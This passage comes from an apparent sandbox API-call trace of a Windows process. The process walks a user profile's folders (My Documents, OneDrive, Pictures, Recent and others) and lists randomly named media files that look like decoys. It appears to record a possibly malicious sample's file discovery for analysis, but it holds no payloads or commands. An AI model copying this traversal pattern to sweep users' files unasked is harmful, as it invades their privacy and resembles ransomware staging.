dwReserved1=0x0, cFileName="BJHxLX", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37e14520, ftCreationTime.dwHighDateTime=0x1d89e1d, ftLastAccessTime.dwLowDateTime=0x6130d800, ftLastAccessTime.dwHighDateTime=0x1d89ee5, ftLastWriteTime.dwLowDateTime=0x6130d800, ftLastWriteTime.dwHighDateTime=0x1d89ee5, nFileSizeHigh=0x0, nFileSizeLow=0x6b4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="esAg2qtf u0s5C0MdPd.mp3", cAlternateFileName="ESAG2Q~1.MP3")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6de5abf0, ftCreationTime.dwHighDateTime=0x1d89aeb, ftLastAccessTime.dwLowDateTime=0x10a99ca0, ftLastAccessTime.dwHighDateTime=0x1d8a5e3, ftLastWriteTime.dwLowDateTime=0x10a99ca0, ftLastWriteTime.dwHighDateTime=0x1d8a5e3, nFileSizeHigh=0x0, nFileSizeLow=0xea4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IKpVnLx.m4a", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637098e0, ftCreationTime.dwHighDateTime=0x1d8a024, ftLastAccessTime.dwLowDateTime=0xa695d5c0, ftLastAccessTime.dwHighDateTime=0x1d8a486, ftLastWriteTime.dwLowDateTime=0xa695d5c0, ftLastWriteTime.dwHighDateTime=0x1d8a486, nFileSizeHigh=0x0, nFileSizeLow=0x4270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6JNV8GX8rXbh.wav", cAlternateFileName="J6JNV8~1.WAV")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mXrqWFqcp", cAlternateFileName="MXRQWF~1")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0fd0f0, ftCreationTime.dwHighDateTime=0x1d8986e, ftLastAccessTime.dwLowDateTime=0xa3c3f440, ftLastAccessTime.dwHighDateTime=0x1d8a48a, ftLastWriteTime.dwLowDateTime=0xa3c3f440, ftLastWriteTime.dwHighDateTime=0x1d8a48a, nFileSizeHigh=0x0, nFileSizeLow=0xb80c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nmf9EMIHkrld8q1qS.mp3", cAlternateFileName="NMF9EM~1.MP3")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd85f7380, ftCreationTime.dwHighDateTime=0x1d8a11c, ftLastAccessTime.dwLowDateTime=0x58f4f280, ftLastAccessTime.dwHighDateTime=0x1d8a5d3, ftLastWriteTime.dwLowDateTime=0x58f4f280, ftLastWriteTime.dwHighDateTime=0x1d8a5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1cd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OlZ6-jXMW7o1_h PvU.mp3", cAlternateFileName="OLZ6-J~1.MP3")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0ac0860, ftCreationTime.dwHighDateTime=0x1d8979d, ftLastAccessTime.dwLowDateTime=0x581346b0, ftLastAccessTime.dwHighDateTime=0x1d8a091, ftLastWriteTime.dwLowDateTime=0x581346b0, ftLastWriteTime.dwHighDateTime=0x1d8a091, nFileSizeHigh=0x0, nFileSizeLow=0x4d49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p5Fl21.m4a", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0 [0184.958] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.959] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.959] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0184.959] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.959] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.959] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.959] PathFindFileNameW (pszPath="") returned="" [0184.959] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0xffffffff [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0184.960] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.960] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0184.960] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.960] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.960] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.960] PathFindFileNameW (pszPath="") returned="" [0184.960] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0xffffffff [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.960] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.960] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0184.961] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.961] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.961] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.961] PathFindFileNameW (pszPath="") returned="" [0184.961] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.962] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.962] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.962] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0184.962] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.962] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0184.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.962] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.963] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.963] PathFindFileNameW (pszPath="") returned="" [0184.963] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e71cb90, ftCreationTime.dwHighDateTime=0x1d8a5d6, ftLastAccessTime.dwLowDateTime=0x5fa78fa0, ftLastAccessTime.dwHighDateTime=0x1d8a5da, ftLastWriteTime.dwLowDateTime=0x5fa78fa0, ftLastWriteTime.dwHighDateTime=0x1d8a5da, nFileSizeHigh=0x0, nFileSizeLow=0x1218c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77x _hI5d64N725mY.bmp", cAlternateFileName="77X_HI~1.BMP")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x430299f0, ftCreationTime.dwHighDateTime=0x1d8a088, ftLastAccessTime.dwLowDateTime=0x7e219da0, ftLastAccessTime.dwHighDateTime=0x1d8a390, ftLastWriteTime.dwLowDateTime=0x7e219da0, ftLastWriteTime.dwHighDateTime=0x1d8a390, nFileSizeHigh=0x0, nFileSizeLow=0xcfaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQiz44uQ681_7Dctbgxp.jpg", cAlternateFileName="BQIZ44~1.JPG")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x655d7070, ftCreationTime.dwHighDateTime=0x1d89f42, ftLastAccessTime.dwLowDateTime=0x24ca5150, ftLastAccessTime.dwHighDateTime=0x1d8a24d, ftLastWriteTime.dwLowDateTime=0x24ca5150, ftLastWriteTime.dwHighDateTime=0x1d8a24d, nFileSizeHigh=0x0, nFileSizeLow=0x11f48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eoTPxOdhMybXN _gV_k_.jpg", cAlternateFileName="EOTPXO~1.JPG")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ecac60, ftCreationTime.dwHighDateTime=0x1d8a1c1, ftLastAccessTime.dwLowDateTime=0x27d59ab0, ftLastAccessTime.dwHighDateTime=0x1d8a71d, ftLastWriteTime.dwLowDateTime=0x27d59ab0, ftLastWriteTime.dwHighDateTime=0x1d8a71d, nFileSizeHigh=0x0, nFileSizeLow=0x39c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HZvZCiMH.gif", cAlternateFileName="")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KiR-tAs9lgdEh FXubwY", cAlternateFileName="KIR-TA~1")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyMAgs7f-4q1mza r", cAlternateFileName="KYMAGS~1")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef7c00, ftCreationTime.dwHighDateTime=0x1d89a0c, ftLastAccessTime.dwLowDateTime=0x19eea700, ftLastAccessTime.dwHighDateTime=0x1d8a161, ftLastWriteTime.dwLowDateTime=0x19eea700, ftLastWriteTime.dwHighDateTime=0x1d8a161, nFileSizeHigh=0x0, nFileSizeLow=0xfb9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n-nH-E2t.jpg", cAlternateFileName="")) returned 1 [0184.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ffba840, ftCreationTime.dwHighDateTime=0x1d8996c, ftLastAccessTime.dwLowDateTime=0xf72e6a00, ftLastAccessTime.dwHighDateTime=0x1d8a11c, ftLastWriteTime.dwLowDateTime=0xf72e6a00, ftLastWriteTime.dwHighDateTime=0x1d8a11c, nFileSizeHigh=0x0, nFileSizeLow=0x134b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O_9gyTeSlm.jpg", cAlternateFileName="O_9GYT~1.JPG")) returned 1 [0184.964] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf543d8b0, ftCreationTime.dwHighDateTime=0x1d89974, ftLastAccessTime.dwLowDateTime=0xab531df0, ftLastAccessTime.dwHighDateTime=0x1d8a0dc, ftLastWriteTime.dwLowDateTime=0xab531df0, ftLastWriteTime.dwHighDateTime=0x1d8a0dc, nFileSizeHigh=0x0, nFileSizeLow=0x6319, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZcqJ4cWJ.png", cAlternateFileName="YZCQJ4~1.PNG")) returned 1 [0184.964] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 1 [0184.964] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0 [0184.964] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.964] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.964] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0184.964] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.964] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.964] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.964] PathFindFileNameW (pszPath="") returned="" [0184.964] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0xffffffff [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.964] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.964] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0184.965] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.965] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.965] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.965] PathFindFileNameW (pszPath="") returned="" [0184.965] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0xffffffff [0184.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.965] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.965] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0184.965] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.965] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.965] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.965] PathFindFileNameW (pszPath="") returned="" [0184.965] 